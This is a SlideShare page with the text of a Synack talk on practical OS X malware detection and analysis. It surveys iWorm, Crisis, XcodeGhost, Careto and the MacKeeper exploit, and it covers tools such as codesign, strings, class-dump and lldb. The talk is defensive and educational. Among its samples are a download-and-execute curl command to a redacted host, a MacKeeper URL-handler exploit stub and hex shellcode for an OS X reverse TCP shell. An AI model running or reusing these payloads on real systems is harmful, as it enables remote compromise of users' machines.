Synack, profile picture
Uploaded bySynack
PDF, PPTX1,519 views

OS X Malware: Let's Play Doctor

The document discusses OS X malware analysis and provides information on: - Common infection vectors for OS X malware including exploits and fake installers - Persistence mechanisms like launch agents and browser extensions - Features of OS X malware like collecting keylogs, downloads and executing files - Steps to analyze a system for malware including checking processes, persistence and network connections - Methods for analyzing suspicious files like code signing, hashing, strings extraction and class dumping

Embed presentation

Download as PDF, PPTX
Let’s Play Doctor Practical OS X Malware Detection & Analysis
“leverages the best combina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby [ WHOIS ]
SO WHY SYNACK? …really, a no brainer ;) higher payouts quicker payouts more bugs
OUTLINE steps to a happier, healthier 2016 outbreaks diagnos9cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
PART 0X1: OUTBREAKS overview of recent OS X malware specimens
MALWARE ON OS X yes; it exists and is geXng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soAware by CVE count -cve details
OS X/IWORM ‘standard’ backdoor, providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis9ng infected torrents launch daemon plist
OS X/CRISIS (RCSMAC) hackingteam's implant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec9on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
OS X/XCODEGHOST applicadon infector $ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
} OS X/GENIEO (INKEEPR) most prolific os x adware browser extension(s) fake installers bundled with apps ADs
OS X/BACKDOOR(?) bot/backdoor that exploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
OS X/CARETO ('MASK') ‘cyber-espionage backdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
PART 0X2: VIROLOGY study of os x malware characterisdcs & commonalides
INFECTION VECTORS method 0x1: via user-interacdon fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
INFECTION VECTORS method 0x2: exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
PERSISTENCE many opdons, few used launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
FEATURES dependent on the goals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
SUMMARY the current state of OS X malware persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca9on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an9-AV ‣ no psp detec9on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec9on ‣ trojans/phishing ‣ some exploits
PART 0X3: DIAGNOSTICS are you possibly infected?
VISUALLY OBSERVABLE INDICATORS more oken than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected" "myhomepageandsearch engineareweird" most not trivially observable!
VISUALLY OBSERVABLE INDICATORS generic alerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
STEP 0X1: KNOWN MALWARE any known malware running on your system? VT ratios
STEP 0X2: SUSPICIOUS PROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
STEP 0X3: SUSPICIOUS PERSISTENCE any unrecognized binaries persisdng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! suspiciousitem unrecognized(byVT) + +
STEP 0X4: NETWORK I/O odd ports or unrecognized connecdons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
STEP 0X5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
PART 0X4: ANALYSIS determine if something is malicious....or not!?
CODE-SIGNING examine the binary’s code signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
GOOGLE THE HASH may (quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
STRINGS quickly triage a binary’s funcdonality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
FILE ATTRIBUTES OS X nadvely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp9ng the malware $ strings -a myMalware infectUser: ALOHA NULLCON! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
FILE ATTRIBUTES detecdng encrypted binaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec9ng encryp9on TaskExplorer }unsigned encrypted +
FILE ATTRIBUTES malware is oken packed to 'hinder' detecdon/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
CLASSDUMP extract class names, methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
DYNAMIC FILE I/O quickly determine binaries file-related acdons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
NETWORK I/O gain insight into the binary's network communicadons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
VIRUSTOTAL SANDBOX file i/o + network i/o, and more! virustotalportal filei/o networki/o "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
REVERSING OBJECTIVE-C understand a few basic concepts connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
DECOMPILATION there’s an app for that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
DEBUGGING using lldb; os x’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
PART 0X5: HEALTH & HAPPINESS how do i protect my personal macs?
APPLE'S OS X SECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -9m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
only 4 launch items no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
OS X LOCKDOWN hardens OS X & reduces its aqack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
OS X SECURITY TOOL LiqleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
MY PERSONAL SECURITY TOOLS Objecdve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
SECURITY TOOLS Objecdve-See; free OS X security tools KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr Lockdown specimenstoplaywith!
CONCLUSIONS wrapping this all up…
CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learned about: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis
credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 - thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources

More Related Content

PDF
Black Hat '15: Writing Bad @$$ Malware for OS X
bySynack
 
PDF
RSA OSX Malware
bySynack
 
PDF
Synack at AppSec California with Patrick Wardle
bySynack
 
PDF
Gatekeeper Exposed
bySynack
 
PDF
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 
PDF
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
bySynack
 
PDF
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
PDF
DLL Hijacking on OS X
bySynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
bySynack
 
RSA OSX Malware
bySynack
 
Synack at AppSec California with Patrick Wardle
bySynack
 
Gatekeeper Exposed
bySynack
 
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
bySynack
 
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
DLL Hijacking on OS X
bySynack
 

What's hot

PDF
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
bySynack
 
PDF
iOS Automation Primitives
bySynack
 
PDF
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
PDF
Synack at AppSec California 2015 - Geolocation Vulnerabilities
bySynack
 
PDF
Synack at ShmooCon 2015
bySynack
 
PDF
DEF CON 23: Internet of Things: Hacking 14 Devices
bySynack
 
PDF
Threat stack aws
byJen Andre
 
PDF
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
PDF
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
PDF
The Mouse is mightier than the sword
byPriyanka Aash
 
PDF
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
PDF
sf bay area dfir meetup (2016-04-30) - OsxCollector
byRishi Bhargava
 
PDF
Applications secure by default
bySecuRing
 
PDF
Csw2016 economou nissim-getting_physical
byCanSecWest
 
PDF
Внедрение безопасности в веб-приложениях в среде выполнения
byPositive Hack Days
 
PDF
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
byRootedCON
 
PDF
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
PDF
Docker app armor_usecase
byKazuki Omo
 
PPTX
How to drive a malware analyst crazy
byMichael Boman
 
PPT
На страже ваших денег и данных
byPositive Hack Days
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
bySynack
 
iOS Automation Primitives
bySynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
bySynack
 
Synack at ShmooCon 2015
bySynack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
bySynack
 
Threat stack aws
byJen Andre
 
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
The Mouse is mightier than the sword
byPriyanka Aash
 
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
byRishi Bhargava
 
Applications secure by default
bySecuRing
 
Csw2016 economou nissim-getting_physical
byCanSecWest
 
Внедрение безопасности в веб-приложениях в среде выполнения
byPositive Hack Days
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
byRootedCON
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
Docker app armor_usecase
byKazuki Omo
 
How to drive a malware analyst crazy
byMichael Boman
 
На страже ваших денег и данных
byPositive Hack Days
 

Viewers also liked

PDF
Synack cirtical infrasructure webinar
bySynack
 
PDF
Zeronights 2016 - Automating iOS blackbox security scanning
bySynack
 
PPTX
TAPipedia User Tutorial
byTheo Kontogiannis
 
DOCX
Storyboard
byXiao Yun
 
DOCX
Compare hk,taiwan,sh movies
byXiao Yun
 
DOCX
Zhang yi mou (lee sweet wan)
byXiao Yun
 
PDF
Asset management report 2015
byCyril BOUCHU
 
PDF
Mgo+eps+mgo structural insulated panels
bysips-structural-insulated-panels
 
PDF
Come scegliere l'album di matrimonio?
byMarco Gabriella
 
PDF
10 Passos para mudar sua vida completamente
byPaulo Nagawa
 
PDF
Osb sips structrual insulated panels
bysips-structural-insulated-panels
 
PDF
Osb eps osb structural insulated panels
bysips-structural-insulated-panels
 
PPTX
Information literacy scaffolds in the 9-12 classroom
byfredandkell
 
PDF
Sips structural insulated panel pressing machine
bysips-structural-insulated-panels
 
PDF
Mgo eps mgo structural insulated panels
bysips-structural-insulated-panels
 
DOCX
pJapanese director (hayao miyazaki)
byXiao Yun
 
DOCX
Documentary proposal
byXiao Yun
 
PDF
Crack the Consumer Code
byPlaceable
 
Synack cirtical infrasructure webinar
bySynack
 
Zeronights 2016 - Automating iOS blackbox security scanning
bySynack
 
TAPipedia User Tutorial
byTheo Kontogiannis
 
Storyboard
byXiao Yun
 
Compare hk,taiwan,sh movies
byXiao Yun
 
Zhang yi mou (lee sweet wan)
byXiao Yun
 
Asset management report 2015
byCyril BOUCHU
 
Mgo+eps+mgo structural insulated panels
bysips-structural-insulated-panels
 
Come scegliere l'album di matrimonio?
byMarco Gabriella
 
10 Passos para mudar sua vida completamente
byPaulo Nagawa
 
Osb sips structrual insulated panels
bysips-structural-insulated-panels
 
Osb eps osb structural insulated panels
bysips-structural-insulated-panels
 
Information literacy scaffolds in the 9-12 classroom
byfredandkell
 
Sips structural insulated panel pressing machine
bysips-structural-insulated-panels
 
Mgo eps mgo structural insulated panels
bysips-structural-insulated-panels
 
pJapanese director (hayao miyazaki)
byXiao Yun
 
Documentary proposal
byXiao Yun
 
Crack the Consumer Code
byPlaceable
 

Similar to OS X Malware: Let's Play Doctor

PDF
Synack Shakacon OSX Malware Persistence
byIvan Einstein
 
PPTX
OSX/Pirrit: The blue balls of OS X adware
byAmit Serper
 
PDF
Let's Play Doctor....by Patrick Wardle
byShakacon
 
PDF
macOS Vulnerabilities Hiding in Plain Sight
byCsaba Fitzl
 
PPTX
Detecting Bad Apples: Understanding macOS Malware TTPs by Surya Teja
byCysinfo Cyber Security Community
 
PDF
Attacking the macOS Kernel Graphics Driver
byPriyanka Aash
 
PDF
OSX Pirrit : Why you should care about malicious mac adware
byPriyanka Aash
 
PPTX
Mmw mac malware-mac
byCyphort
 
PDF
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
byFelipe Prado
 
PDF
Kaspersky Anti-Virus for Macintosh - Technical Presentation
byquestar
 
PDF
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
byMITRE ATT&CK
 
PDF
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
byOlehLevytskyi1
 
PPT
Rootkit Hunting & Compromise Detection
byamiable_indian
 
PDF
Mitigating Exploits Using Apple's Endpoint Security
byCsaba Fitzl
 
PDF
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
byTzung-Bi Shih
 
PPTX
Open Source Malware Lab
byThreatConnect
 
PDF
20111204 intro malware_livshits_lecture02
byComputer Science Club
 
PPTX
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
PDF
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymnglyse
 
PPS
Viruses and Anti-Viruses
byAyman Hussein
 
Synack Shakacon OSX Malware Persistence
byIvan Einstein
 
OSX/Pirrit: The blue balls of OS X adware
byAmit Serper
 
Let's Play Doctor....by Patrick Wardle
byShakacon
 
macOS Vulnerabilities Hiding in Plain Sight
byCsaba Fitzl
 
Detecting Bad Apples: Understanding macOS Malware TTPs by Surya Teja
byCysinfo Cyber Security Community
 
Attacking the macOS Kernel Graphics Driver
byPriyanka Aash
 
OSX Pirrit : Why you should care about malicious mac adware
byPriyanka Aash
 
Mmw mac malware-mac
byCyphort
 
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
byFelipe Prado
 
Kaspersky Anti-Virus for Macintosh - Technical Presentation
byquestar
 
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
byMITRE ATT&CK
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
byOlehLevytskyi1
 
Rootkit Hunting & Compromise Detection
byamiable_indian
 
Mitigating Exploits Using Apple's Endpoint Security
byCsaba Fitzl
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
byTzung-Bi Shih
 
Open Source Malware Lab
byThreatConnect
 
20111204 intro malware_livshits_lecture02
byComputer Science Club
 
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymnglyse
 
Viruses and Anti-Viruses
byAyman Hussein
 

Recently uploaded

PPTX
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
PPTX
Gemini vs ChatGPT : Comparing Top AI Models
byDigicarrom
 
PDF
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
PPTX
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
PDF
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PDF
WHITE PAPER_ Ransomware Payment Policy and Resilience Strategy_ A Framework f...
byssuser0d171c
 
PPTX
Session 2 - Solving Unstructured & Complex Documents with UiPath IXP
byDianaGray10
 
PDF
How to Evaluate a High Performance Database
byScyllaDB
 
PPTX
Conversational Agents – Building Intelligent Assistants [Virtual Hands-on Wor...
byUiPathCommunity
 
PPTX
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
PPTX
communication-skills-with-technology tools
byJaleto Sunkemo
 
PDF
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
PPTX
How to make Ai agents using Google Gemini AI.pptx
bypkluffy111
 
PDF
Exam Prep Plan Overview: Amazon Web Services (AWS) Certified
byVICTOR MAESTRE RAMIREZ
 
PDF
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
PDF
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
PDF
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
Gemini vs ChatGPT : Comparing Top AI Models
byDigicarrom
 
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
WHITE PAPER_ Ransomware Payment Policy and Resilience Strategy_ A Framework f...
byssuser0d171c
 
Session 2 - Solving Unstructured & Complex Documents with UiPath IXP
byDianaGray10
 
How to Evaluate a High Performance Database
byScyllaDB
 
Conversational Agents – Building Intelligent Assistants [Virtual Hands-on Wor...
byUiPathCommunity
 
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
communication-skills-with-technology tools
byJaleto Sunkemo
 
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
How to make Ai agents using Google Gemini AI.pptx
bypkluffy111
 
Exam Prep Plan Overview: Amazon Web Services (AWS) Certified
byVICTOR MAESTRE RAMIREZ
 
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 

OS X Malware: Let's Play Doctor

  • 1.
    Let’s Play Doctor PracticalOS X Malware Detection & Analysis
  • 2.
    “leverages the bestcombina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby [ WHOIS ]
  • 3.
    SO WHY SYNACK? …really,a no brainer ;) higher payouts quicker payouts more bugs
  • 4.
    OUTLINE steps to ahappier, healthier 2016 outbreaks diagnos9cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
  • 5.
    PART 0X1: OUTBREAKS overviewof recent OS X malware specimens
  • 6.
    MALWARE ON OSX yes; it exists and is geXng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soAware by CVE count -cve details
  • 7.
    OS X/IWORM ‘standard’ backdoor,providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis9ng infected torrents launch daemon plist
  • 8.
    OS X/CRISIS (RCSMAC) hackingteam'simplant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec9on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
  • 9.
    OS X/XCODEGHOST applicadon infector $less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
  • 10.
    } OS X/GENIEO (INKEEPR) mostprolific os x adware browser extension(s) fake installers bundled with apps ADs
  • 11.
